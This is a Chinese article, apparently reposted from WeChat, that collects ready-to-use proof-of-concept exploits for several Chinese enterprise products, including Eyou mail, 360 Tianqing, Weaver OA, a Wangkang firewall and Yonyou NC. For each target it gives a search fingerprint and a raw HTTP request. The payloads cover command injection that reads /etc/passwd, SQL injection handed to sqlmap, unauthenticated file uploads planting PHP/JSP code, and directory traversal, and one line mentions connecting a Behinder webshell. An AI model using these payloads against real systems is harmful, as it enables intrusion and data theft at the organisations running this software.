本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com
- 亿邮电子邮件系统远程命令执行
body="亿邮电子邮件系统"
POC:
POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
Host: x.x.x.x
Content-Length: 25
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chro·me/89.0.4389.114 Safari/537.36
type='|cat /etc/passwd||'
- 360 天擎终端安全管理系统前台 SQL 注入
title="360天擎"
注入点 ccid:
/api/dp/rptsvcsyncpoint?ccid=1
访问 http://x.x.x.x:x/api/dp/rptsvcsyncpoint?ccid=1,返回的 json 数据包中包含 reason: "success",说明存在该漏洞
GET /api/dp/rptsvcsyncpoint?ccid=1 HTTP/1.1
Host: x.x.x.x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SKYLAR6245a4607a3abfe4722059886f=11uqi05v66mcua075ojrhn4lt1; YII_CSRF_TOKEN=d054b4d32ba8bd1006384c897e3bcc59137cbb96s%3A40%3A%22320759c11f5391c38c93ab149a3c8085e5413f35%22%3B
Connection: close
sqlmap 梭哈:
2.1 天擎 数据库信息泄露漏洞
poc:
http://x.x.x.x/api/dbstat/gettablessize
- 核心创天云桌面系统远程命令执行
body="和信下一代云桌面"
前台的样子:
POC:
POST /Upload/upload_file.php?l=test HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,fil;q=0.8
Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
Content-Length: 183
------WebKitFormBoundaryfcKRltGv
Content-Disposition: form-data;
Content-Type: image/avif
<?php phpinfo(); ?>
------WebKitFormBoundaryfcKRltGv--
上传后访问:
http://xxx.xx.xxx.xxx/Upload/test/test.php
- 泛微 OA V9 前台上传漏洞
app="Weaver-OA"
POC:
POST /page/exportImport/uploadOperation.jsp HTTP/1.1
Host: x.x.x.x
Content-Length: 216
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x/
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFy3iNVBftjP6IOwo
Connection: close
------WebKitFormBoundaryFy3iNVBftjP6IOwo
Content-Disposition: form-data;
Content-Type: application/octet-stream
<%out.print(1111);%>
------WebKitFormBoundaryFy3iNVBftjP6IOwo--
然后访问:
page/exportImport/fileTransfer/12.jsp
这里传了冰蝎连不上,不知道是不是 waf 的原因。未作深究
- 奇安信 网康下一代防火墙 RCE
app="网康科技-下一代防火墙"
POC:
POST /directdata/direct/router HTTP/1.1
Host: x.x.x.x
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://x.x.x.x/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=d6o8gdugrhmvf2sq18ojhj50p3; ys-active_page=s%3A
Content-Length: 178
{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test_test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
访问:https://x.x.x.x/test_test.txt
- 用友 ERP-NC 目录遍历漏洞
app="用友-UFIDA-NC"
POC:
/NCFindWeb?service=IPreAlertConfigService&filename=
在 filename 后面加文件名即可读取文件:
/NCFindWeb?service=IPreAlertConfigService&filename=ncwslogin.jsp
公众号